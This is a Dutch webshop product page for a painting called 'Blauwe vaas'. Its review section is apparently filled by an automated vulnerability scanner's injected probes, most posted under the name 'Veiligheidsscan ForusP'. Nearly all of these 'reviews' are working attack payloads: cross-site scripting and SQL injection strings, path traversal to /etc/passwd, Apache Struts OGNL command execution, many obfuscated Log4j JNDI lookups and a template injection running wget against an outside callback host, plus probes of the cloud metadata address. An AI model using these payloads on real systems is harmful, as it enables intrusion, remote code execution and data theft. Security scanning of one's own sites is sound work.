Blauwe vaas

(269 klantbeoordelingen)

Blauwe vaas, acryl op doek, 70 x 100

Henna Oostveen

Beschrijving

big460372a2da08f0c039

Deze post is ook beschikbaar in: Engels Spaans

Extra informatie

Gewicht 1 kg
Afmetingen 70 × 100 × 2 cm

269 beoordelingen voor Blauwe vaas

  1. Veiligheidsscan ForusP

    _q=random(X155425464Y3_2Z)

  2. Veiligheidsscan ForusP

    ‘ onEvent=X155425464Y3_2Z

  3. Veiligheidsscan ForusP

    ” onEvent=X155425464Y3_2Z

  4. Veiligheidsscan ForusP

    javascript:qxss(X155425464Y3_2Z);

  5. Veiligheidsscan ForusP

    1 _q_q=random(06NctVfc)

  6. Veiligheidsscan ForusP

  7. Veiligheidsscan ForusP

    ” SRC=//localhost/j363flE6B>

  8. Veiligheidsscan ForusP

    “‘><qssj04mY8MV=7;//<

  9. Veiligheidsscan ForusP

    1″>

  10. Veiligheidsscan ForusP

    BODY{background:url(“javascript:qssm4H1K36m=7”)}

  11. Veiligheidsscan ForusP

    qssyGnWce3B=7

  12. Veiligheidsscan ForusP

    %3cscript z%3e_q(y)%3c/script%3e

  13. Veiligheidsscan ForusP

    <script src=http://localhost/j

  14. Veiligheidsscan ForusP

    q
    Content-Type:text/html
    Content-Length: 190

    HTTP/1.1 200 OK
    Content-Type: text/html
    Set-Cookie: a=q
    Content-Length: 2

    AA

  15. Veiligheidsscan ForusP

    q
    Qualys_resp_hdr_injection: Vulnerable

  16. Veiligheidsscan ForusP

    q
    Qualys_resp_hdr_injection: Vulnerable

  17. Veiligheidsscan ForusP

    qualyswasesi

  18. Veiligheidsscan ForusP

    1′

  19. Veiligheidsscan ForusP

    ;–

  20. Veiligheidsscan ForusP

    #

  21. Veiligheidsscan ForusP

    /*

  22. Veiligheidsscan ForusP

  23. Veiligheidsscan ForusP

    ,

  24. Veiligheidsscan ForusP

    (

  25. Veiligheidsscan ForusP

    1e309

  26. Veiligheidsscan ForusP

    _q=random(X148124996Y3_2Z)

  27. Veiligheidsscan ForusP

    ‘ onEvent=X148124996Y3_2Z

  28. Veiligheidsscan ForusP

    ” onEvent=X148124996Y3_2Z

  29. Veiligheidsscan ForusP

    javascript:qxss(X148124996Y3_2Z);

  30. Veiligheidsscan ForusP

    1 _q_q=random(3sju7jw2)

  31. Veiligheidsscan ForusP

    ” SRC=//localhost/jg396dPG5>

  32. Veiligheidsscan ForusP

    “‘><qssOC8N4XNF=7;//<

  33. Veiligheidsscan ForusP

    BODY{background:url(“javascript:qss04D06H6O=7”)}

  34. Veiligheidsscan ForusP

    qssR5Sj5NzD=7

  35. Veiligheidsscan ForusP

    //….//….//….//….//….//….//….//etc/passwd

  36. Veiligheidsscan ForusP

    php://filter/read=string.rot13/resource=/etc/passwd

  37. Veiligheidsscan ForusP

    ….//….//….//….//….//….//etc/passwd

  38. Veiligheidsscan ForusP

    %{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

  39. Veiligheidsscan ForusP

    %25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

  40. Veiligheidsscan ForusP

    %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  41. Veiligheidsscan ForusP

    a(){}phpinfo(); function a

  42. Veiligheidsscan ForusP

    |netstat -an

  43. Veiligheidsscan ForusP

  44. Veiligheidsscan ForusP

    “;(function(){qxssa6Z0Wyne});/**/”

  45. Veiligheidsscan ForusP

    “);(function(){qxsslk6o6573});/**/”

  46. Veiligheidsscan ForusP

    qualys(aqxsscSAEjCOj)xyz

  47. Veiligheidsscan ForusP

    ‘;(function(){qxssvo4NOya3});/**/’

  48. Veiligheidsscan ForusP

    9;(function(){qxssQAszL6NX});//

  49. Veiligheidsscan ForusP

    9
    ;(function(){qxss3s6t0FlF});//

  50. Veiligheidsscan ForusP

    */;(function(){qxssp5FI4eCW});/*

  51. Veiligheidsscan ForusP

    ‘-qxss3DrxSMUI()-‘

  52. Veiligheidsscan ForusP

    “-qxss7g71j6tN()-“

  53. Veiligheidsscan ForusP

    |aaaa
    =(23.0231*213.759)
    |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}

  54. Veiligheidsscan ForusP

    {23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}

  55. Veiligheidsscan ForusP

    ;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/}
    /*

    #set($value=23.0231*213.759)
    $value
    */

  56. Veiligheidsscan ForusP

    (23.0231*213.759)

  57. Veiligheidsscan ForusP

    <!–#config timefmt="” –>qualyswas:

  58. Veiligheidsscan ForusP

    function(){qxss8dyD6tN9};

  59. Veiligheidsscan ForusP

  60. Veiligheidsscan ForusP

    Joe+
    bcc:was_engine@d1a17691d03c01852952d984e30f6068694e7cb9.1647394710231792.241763440.smtphi01.smtp.eu1.qualysperiscope.com.

  61. Veiligheidsscan ForusP

    ping -c 2 d027049c6663a9e68125a226e69ec804f9b3c1fe.1647394710231792.3255369285.oscomm01.oscomm.eu1.qualysperiscope.com.

  62. Veiligheidsscan ForusP

    ${jndi:ldap://45cbcb7e2ad99d52ebbe72379710ffce9d18f857.1647394710231792.55642482.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}

  63. Veiligheidsscan ForusP

    ${jndi:rmi://860ed3a120e0198d5158e2b6ee45dedd774823aa.1647394710231792.2283407039.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}

  64. Veiligheidsscan ForusP

    ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://c34cc0a191d1dd2be80ac8c7b2c14e91882bb97b.1647394710231792.154092870.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}

  65. Veiligheidsscan ForusP

    ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://acb0628febc2ecb4791459590014ff7cfb6b86eb.1647394710231792.3017643571.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}

  66. Veiligheidsscan ForusP

    ${j${::-n}di:ldap${::-:}//e95337fb9732cc72e2895b319c5274db68bce097.1647394710231792.1390049572.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}

  67. Veiligheidsscan ForusP

    ${jnd${123%ff:-${123%ff:-i:}}ldap://49c1587098df5b938b7d426fe76c65b3cf7d8420.1647394710231792.1374629662.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}

  68. Veiligheidsscan ForusP

    ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//c6dd16ac246b1fcb887806f5623f0d45d8e3fe7b.1647394710231792.2710620156.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}

  69. Veiligheidsscan ForusP

    ${jndi:dns://1856d46e575a1d402755c8ef24e104bf50fb4888.1647394710231792.1803850796.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}

  70. Veiligheidsscan ForusP

    ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//9b71afd62afe5a93eff6b50fb0157dcfb6981d24.1647394710231792.2309114275.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}

  71. Veiligheidsscan ForusP

    ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://138bb305b4fb51a4fcdc0589cd090c959981ccbf.1647394710231792.490799223.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}

  72. Veiligheidsscan ForusP

    ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://c4ded52d66af18135e20139f246cf6dff3af8f28.1647394710231792.994722055.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}

  73. Veiligheidsscan ForusP

    {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://955022ea4614139f50d657834d9b0765939dee00.1647394710231792.2363667391.oscomm15019101.oscomm.eu1.qualysperiscope.com.’).read() }}

  74. Veiligheidsscan ForusP

    1′) or 2634=2634 —

  75. Veiligheidsscan ForusP

    1′ or 3789=3789 —

  76. Veiligheidsscan ForusP

    1 or 4325=4325 —

  77. Veiligheidsscan ForusP

    1 or NULL IS NULL

  78. Veiligheidsscan ForusP

    1 and NULL IS NULL

  79. Veiligheidsscan ForusP

    1′) or ‘swqtp’=’swqtp

  80. Veiligheidsscan ForusP

    1′ or ‘tpklq’=’tpklq

  81. Veiligheidsscan ForusP

    11 or 11=11

  82. Veiligheidsscan ForusP

    1′ or true() or ‘and’ = ‘and

  83. Veiligheidsscan ForusP

    1 or true() or ‘and’ = ‘and’

  84. Veiligheidsscan ForusP

    1″ or true() or “and” = “and

  85. Veiligheidsscan ForusP

    aaaa&ping -n 92 localhost&

  86. 1

    1

  87. 1

    “‘>

  88. 1

    ‘ onEvent=X140021447745280Y3_2Z

  89. 1

    ” onEvent=X140021447745280Y3_2Z

  90. 1

    “>

  91. 1

    1″‘>

  92. 1

    z–>

  93. “‘>

    1

  94. ‘ onEvent=X140021447745280Y4_2Z

    1

  95. ” onEvent=X140021447745280Y4_2Z

    1

  96. 1

    qssnRtiBIBz=7

  97. 1

    %3cscript z%3e_q(y)%3c/script%3e

  98. 1

    qss{{q=(2*2.0)}}qss

  99. 1

    {{333*334}}

  100. 1

    q
    Content-Type:text/html
    Content-Length: 190

    HTTP/1.1 200 OK
    Content-Type: text/html
    Set-Cookie: a=q
    Content-Length: 2

    AA

  101. 1

    q
    Qualys_resp_hdr_injection: Vulnerable

  102. 1

    q
    Qualys_resp_hdr_injection: Vulnerable

  103. 1

    qualyswasesi

  104. 1

    1′

  105. 1

    ;–

  106. 1

    #

  107. 1

    /*

  108. 1

  109. 1

    ,

  110. 1

    (

  111. 1

    1e309

  112. 1

    //….//….//….//….//….//….//….//etc/passwd

  113. 1

    php://filter/read=string.rot13/resource=/etc/passwd

  114. 1

    ….//….//….//….//….//….//etc/passwd

  115. 1

    %{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

  116. 1

    %25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

  117. 1

    %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  118. 1

    a(){}phpinfo(); function a

  119. 1

    |netstat -an

  120. 1

  121. 1

    “;(function(){qxssTv7uGkHm});/**/”

  122. 1

    “);(function(){qxssjVYN79l5});/**/”

  123. 1

    qualys(aqxsswL05Zn51)xyz

  124. 1

    ‘;(function(){qxss9ZbgZjk0});/**/’

  125. 1

    9;(function(){qxssLo8R0y29});//

  126. 1

    9
    ;(function(){qxss7I17941y});//

  127. 1

    */;(function(){qxss7MiLrI14});/*

  128. 1

    ‘-qxssJiPmaPsC()-‘

  129. 1

    “-qxssEvihugr5()-“

  130. 1

    1!@#$%^&*()

  131. 1

    !@#$%^&*()1

  132. 1

    !@#$%^&*()

  133. 1

    |aaaa
    =(23.0231*213.759)
    |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}

  134. 1

    {23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}

  135. 1

    ;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/}
    /*

    #set($value=23.0231*213.759)
    $value
    */

  136. 1

    (23.0231*213.759)

  137. 1

    <!–#config timefmt="” –>qualyswas:

  138. 1

  139. 1

    Joe+
    bcc:was_engine@64a0c25dba68b1202c7c609b1983899bcce8072d.1768425210231792.439102371.smtphi01.smtp.eu1.qualysperiscope.com.

  140. 1

    243912f6b397dd98276c6eb89e5ba51b06d44a66.1768425210231792.199406372.ssrf02.ssrf.eu1.qualysperiscope.com.

  141. 1

    ${jndi:ldap://0ad4f415859d11a1ae80c9f8df37281dba6d0f67.1768425210231792.2906698722.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}

  142. 1

    ${jndi:rmi://76b23bf454f0529b07af877189e5b7edca3d5d4e.1768425210231792.948391649.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}

  143. 1

    ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://30c23ee10bd9d2e818926226b04eef1161634070.1768425210231792.1584374305.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}

  144. 1

    ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://f98a51b12cdb29272cb6e537a705fddca24f4adb.1768425210231792.1980643035.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}

  145. 1

    ${j${::-n}di:ldap${::-:}//2c265b1167f1083a84431bd24b93d1baef7f2c9f.1768425210231792.3275852027.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}

  146. 1

    ${jnd${123%ff:-${123%ff:-i:}}ldap://d074498ddec112d653214475b0fb1fab37cd641e.1768425210231792.3219108933.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}

  147. 1

    ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//4aa76c5dd07b4c0f68e9f73c297674d51c552fa6.1768425210231792.448662097.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}

  148. 1

    ${jndi:dns://afbe539500867a48b41f8f2971114a49ec173b98.1768425210231792.3228851950.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}

  149. 1

    ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//ecb4964ef0715d624b6f3f8c04865f1d6ecb2f94.1768425210231792.3818848774.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}

  150. 1

    ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://bd0efaa13ac63464cd1d177096e4955a624e2bf8.1768425210231792.1251551541.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}

  151. 1

    ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://b14c61188c3a85c9fdad89536d70186921a9fdbc.1768425210231792.2748750068.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}

  152. 1

    {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://7cffc2a386cf9274cd7cd1d830fa2a5d2a5889a7.1768425210231792.1605257394.oscomm15019101.oscomm.eu1.qualysperiscope.com.’).read() }}

  153. 1

    1′) or 2634=2634 —

  154. 1

    1′ or 3789=3789 —

  155. 1

    1 or 4325=4325 —

  156. 1

    1 or NULL IS NULL

  157. 1

    1 and NULL IS NULL

  158. 1

    1′) or ‘swqtp’=’swqtp

  159. 1

    1′ or ‘tpklq’=’tpklq

  160. 1

    11 or 11=11

  161. 1

    1′ or true() or ‘and’ = ‘and

  162. 1

    1 or true() or ‘and’ = ‘and’

  163. 1

    1″ or true() or “and” = “and

  164. 1

    aaaa&ping -n 92 localhost&

  165. 1

    ping -c2 -i91 localhost

  166. 1

    |ping -c2 -i56 localhost

  167. 1

    |ping -c2 -i91 localhost|

  168. 1

    1WAITFOR DELAY ’00:00:29′

  169. 1

    1;WAITFOR DELAY ’00:00:29′;

  170. 1

    1);WAITFOR DELAY ’00:00:29′–

  171. 1

    1′;WAITFOR DELAY ’00:00:29′–

  172. 1

    1′);WAITFOR DELAY ’00:00:29′–

  173. 1

    1′,0,0);WAITFOR DELAY’00:00:29′–

  174. 1

    1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)

  175. 1

    1′ + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ‘

  176. 1

    1;SELECT sleep(29); —

  177. 1

    1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/

  178. 1

    1′ WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)– prime

  179. 1

    1′ OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND ‘qualys’=’qualys

  180. 1

    1′; var djci=sleep(29*1000);//

  181. 1

    1′; var djci=sleep(29*1000) + ‘

  182. 1

    1′ + sleep(29*100*Math.sqrt(100)) + ‘

  183. 1

    1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))

  184. 1

    ‘ onEvent=X140530056258384Y3_2Z

  185. 1

    ” onEvent=X140530056258384Y3_2Z

  186. “>

    1

  187. 1″‘>

    1

  188. z–>

    1

  189. ‘ onEvent=X140530056258384Y4_2Z

    1

  190. ” onEvent=X140530056258384Y4_2Z

    1

  191. 1

    qss70dma13B=7

  192. script z_q(y)/script

    1

  193. qss{{q=(2*2.0)}}qss

    1

  194. {{333*334}}

    1

  195. q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA

    1

  196. q Qualys_resp_hdr_injection: Vulnerable

    1

  197. qualyswasesi

    1

  198. 1′

    1

  199. ;–

    1

  200. #

    1

  201. /*

    1

  202. 1

  203. ,

    1

  204. (

    1

  205. 1e309

    1

  206. //….//….//….//….//….//….//….//etc/passwd

    1

  207. php://filter/read=string.rot13/resource=/etc/passwd

    1

  208. ….//….//….//….//….//….//etc/passwd

    1

  209. a(){}phpinfo(); function a

    1

  210. |netstat -an

    1

  211. http://rfitest/

    1

  212. 1

    “;(function(){qxssqOzjBRd3});/**/”

  213. 1

    “);(function(){qxsszQ6l96YJ});/**/”

  214. 1

    qualys(aqxss9B8oWnsv)xyz

  215. 1

    ‘;(function(){qxsseYgpw8wn});/**/’

  216. 1

    9;(function(){qxss9Jyfe23Q});//

  217. 1

    9
    ;(function(){qxss0332zj1k});//

  218. 1

    */;(function(){qxss72O0gCc0});/*

  219. 1

    ‘-qxss2T25j4IO()-‘

  220. 1

    “-qxss06EGYOG9()-“

  221. 1!@#$%^&*()

    1

  222. !@#$%^&*()1

    1

  223. !@#$%^&*()

    1

  224. |aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}

    1

  225. {23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}

    1

  226. ;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/} /* #set($value=23.0231*213.759) $value */

    1

  227. (23.0231*213.759)

    1

  228. qualyswas:

    1

  229. http://169.254.169.254/latest/meta-data/

    1

  230. 1

    Joe+
    bcc:was_engine@652a623fd90d20b4e18d3b1321fbc950218d74f6.1891074910231792.4260144807.smtphi01.smtp.eu1.qualysperiscope.com.

  231. 1

    72fb6c3aab56898ae91a26bff7a6bea0f3a8bd34.1891074910231792.1486900496.ssrf02.ssrf.eu1.qualysperiscope.com.

  232. 1

    ${jndi:ldap://42776c2aeddf11912a41d918ef61282aa934480d.1891074910231792.3937801768.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}

  233. 1

    ${jndi:rmi://08451160cf05b2a91a4bcb548a2065ab8de917a1.1891074910231792.1126332124.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}

  234. 1

    ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://35dc35b2da3b36ee91c2d6ba699aeeedff2d48ce.1891074910231792.1370870654.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}

  235. 1

    ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://08ab272c6a5575260c3355af2172ecc3b8abeca5.1891074910231792.385879357.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}

  236. 1

    ${j${::-n}di:ldap${::-:}//d478bbc8829f292210e3f0b83b71d681ac8c3150.1891074910231792.856199318.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}

  237. 1

    ${jnd${123%ff:-${123%ff:-i:}}ldap://b80a9412ba750e4523acd7b7fb2183ec7fa41436.1891074910231792.131447707.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}

  238. 1

    ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//76e36f9a7f74fe7431d9c837d4a0120cbc7eb35b.1891074910231792.286130878.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}

  239. 1

    ${jndi:dns://602f31bdb07e2e3c0fdd8d7f54b3fb5394a94bf7.1891074910231792.2700444057.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}

  240. 1

    ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//6fa275ef4de80f601dbf21b837f3e21dad0425e1.1891074910231792.4192205300.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}

  241. 1

    ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://e36cec8231a26610c4989d9dda184bcfd74b0be8.1891074910231792.1918054671.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}

  242. 1

    ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://b92c48285387de8febe02ed31c30060dd5487ed8.1891074910231792.4291267542.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}

  243. 1

    {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://7fe13abd246eedcdd5a6f3b996ff28cdf2254d17.1891074910231792.3780372280.oscomm15019101.oscomm.eu1.qualysperiscope.com.’).read() }}

  244. 1

  245. 1

    file:///etc/passwd

  246. 1

    1′) and 2634=1123 —

  247. 1

    1′ and 3789=1391 —

  248. 1

    1 and 4325=2728 —

  249. 1

    1 or 6248 IS NULL

  250. 1

    1 and 7248 IS NULL

  251. 1

    1′) and ‘swqtp’=’ptqws

  252. 1

    1′ and ‘tpklq’=’xqlkp

  253. 1

    11 or 11=12

  254. 1

    1′ and false() and ‘or’ = ‘and

  255. 1

    1 and false() and ‘or’ = ‘and’

  256. 1

    1″ and false() and “or” = “and

  257. aaaa&ping -n 92 localhost&

    1

  258. ping -c2 -i91 localhost

    1

  259. |ping -c2 -i56 localhost

    1

  260. |ping -c2 -i91 localhost|

    1

  261. 1WAITFOR DELAY ’00:00:29′

    1

  262. 1;WAITFOR DELAY ’00:00:29′;

    1

  263. 1);WAITFOR DELAY ’00:00:29′–

    1

  264. 1′;WAITFOR DELAY ’00:00:29′–

    1

  265. 1′);WAITFOR DELAY ’00:00:29′–

    1

  266. 1′,0,0);WAITFOR DELAY’00:00:29′–

    1

Een beoordeling toevoegen

Je e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *